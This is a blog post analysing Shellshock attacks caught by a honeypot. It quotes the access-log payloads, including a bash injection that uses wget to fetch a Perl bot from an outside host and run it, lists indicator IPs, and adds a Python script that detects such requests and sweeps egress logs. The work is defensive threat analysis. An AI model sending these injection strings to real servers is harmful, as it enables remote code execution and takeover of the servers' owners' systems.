by  Marirs

ShellShock Part 2

I know, sometimes things get us obsessed until they are done and finished. Today, after monitoring the logs, I was able to track down yet another two unique alerts from my honeypot.

# tail /var/log/nginx/access.log
29-09-2014 07:43:08,67.227.0.73,() { :;}; /bin/bash -c "wget -P /var/tmp 174.143.240.43/…/x  perl /var/tmp/x",
29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a,

The second alert is interesting: the IP (54.251.83.67) belongs to Amazon Web Services in Singapore. This IP is possibly compromised (I leave that part to Amazon, who has to confirm) or is being used for malicious activity. Though VirusTotal has no significant results yet, one malicious activity has been identified.

VT Link

We have noticed that this particular IP is scanning most organisations, companies and private/personal blogs to see if there are any vulnerabilities. Be on alert for this IP (54.251.83.67) if it hits your network, and block it immediately.

Next, let's talk about the first one.

IP 174.143.240.43 belongs to Rackspace hosting. It uses a directory traversal method to fetch a base64-encoded Perl file and execute it on the vulnerable machine. The Perl file is a Perl bot.

# curl -I http://174.143.240.43/…/x
HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 06:15:28 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Sat, 27 Sep 2014 21:46:13 GMT
ETag: "340b1a-1b4dc-50412f6609340"
Accept-Ranges: bytes
Content-Length: 111836
Content-Type: text/plain
# curl -I http://174.143.240.43/
HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 06:15:33 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 06 Jul 2010 13:09:57 GMT
ETag: "33991a-2d-48ab7c5155340"
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding
Content-Type: text/html

VT Results

New Indicators:

  • 54.251.83.67
  • 174.143.240.43

Block these and keep them at bay. Most firewalls are already doing so. However, it will be interesting to see whether there is any internal network communication to these IPs.
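The two things this post does by hand, spotting the Shellshock payloads in the honeypot log and then asking whether anything inside the network has talked to the indicators, can be scripted. The following is an added example, not code from the post or its author. It assumes the honeypot's log layout is "timestamp,client_ip,user_agent," as the quoted lines suggest (the last field is taken to be the User-Agent, which is where the `() {` function-definition prefix lands before reaching a CGI handler's environment), and it assumes a hypothetical egress log in "src=… dst=…" form. The sample lines are constructed: the first two copy the post's alerts, the third is a benign request, and 10.0.5.23 is an invented internal host. Unlike the post's indicator list, the script also records the scanning source of the first alert (67.227.0.73).

```python
"""Shellshock triage over a honeypot access log, plus an IoC sweep of egress logs."""
import ipaddress
import re
from dataclasses import dataclass, field

# Shellshock signature: the "() {" function-definition prefix at the start of the
# header value (the same prefix as in the post's two alerts).
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Assumed egress/firewall log layout (hypothetical, not from the post).
EGRESS_RE = re.compile(r"src=(?P<src>\S+)\s+dst=(?P<dst>\S+)")

# Constructed sample input in the layout of the honeypot log quoted in the post.
ACCESS_LOG = (
    '29-09-2014 07:43:08,67.227.0.73,() { :;}; /bin/bash -c "wget -P /var/tmp 174.143.240.43/…/x  perl /var/tmp/x",\n'
    '29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a,\n'
    "29-09-2014 09:31:02,203.0.113.5,Mozilla/5.0 (compatible; ExampleBot/1.0),\n"
)

# Constructed egress log; 10.0.5.23 and 10.0.5.40 are invented internal hosts.
EGRESS_LOG = (
    "2014-09-29T10:02:11 src=10.0.5.23 dst=174.143.240.43 dport=80 action=ALLOW\n"
    "2014-09-29T10:02:15 src=10.0.5.40 dst=198.51.100.7 dport=443 action=ALLOW\n"
)


@dataclass
class ShellshockAlert:
    timestamp: str
    source_ip: str
    command: str  # what the attacker tried to run after the "};"
    download_hosts: list = field(default_factory=list)  # IPs named in that command


def parse_line(line):
    """Split a 'timestamp,client_ip,user_agent,' line into its three fields.

    The user-agent is the last field and may itself contain commas, so only the
    first two separators are honoured; the trailing separator is dropped.
    """
    parts = line.rstrip("\n").split(",", 2)
    if len(parts) != 3:
        return None
    ts, ip, ua = parts
    if ua.endswith(","):
        ua = ua[:-1]
    return ts, ip, ua


def extract_hosts(command):
    """Return the valid IPv4 literals mentioned in a command (e.g. a wget target)."""
    hosts = []
    for cand in IPV4_RE.findall(command):
        try:
            ipaddress.IPv4Address(cand)
        except ValueError:
            continue  # e.g. 999.1.1.1 is not an address
        if cand not in hosts:
            hosts.append(cand)
    return hosts


def find_shellshock(text):
    """One ShellshockAlert per log line whose User-Agent carries the "() {" prefix."""
    alerts = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, ua = parsed
        if not SHELLSHOCK_RE.match(ua):
            continue
        # Everything after the function body "{ :;}" is the injected command.
        _, _, cmd = ua.partition("};")
        cmd = cmd.strip()
        alerts.append(ShellshockAlert(ts, ip, cmd, extract_hosts(cmd)))
    return alerts


def build_indicators(alerts):
    """Scanning sources plus the hosts their payloads download from."""
    iocs = set()
    for a in alerts:
        iocs.add(a.source_ip)
        iocs.update(a.download_hosts)
    return iocs


def sweep_egress(egress_text, indicators):
    """(src, dst) pairs for internal hosts that connected to any indicator."""
    hits = []
    for line in egress_text.splitlines():
        m = EGRESS_RE.search(line)
        if m and m.group("dst") in indicators:
            hits.append((m.group("src"), m.group("dst")))
    return hits


if __name__ == "__main__":
    found = find_shellshock(ACCESS_LOG)
    for a in found:
        print(f"{a.timestamp} {a.source_ip} -> {a.command!r} hosts={a.download_hosts}")
    iocs = build_indicators(found)
    print("indicators:", sorted(iocs))
    for src, dst in sweep_egress(EGRESS_LOG, iocs):
        print(f"internal host {src} talked to indicator {dst}")
```

The download hosts are pulled from the injected command rather than from the source address, because the host serving the stager (174.143.240.43 here) is usually not the host doing the scanning, and it is the one an already-compromised internal machine would reach out to.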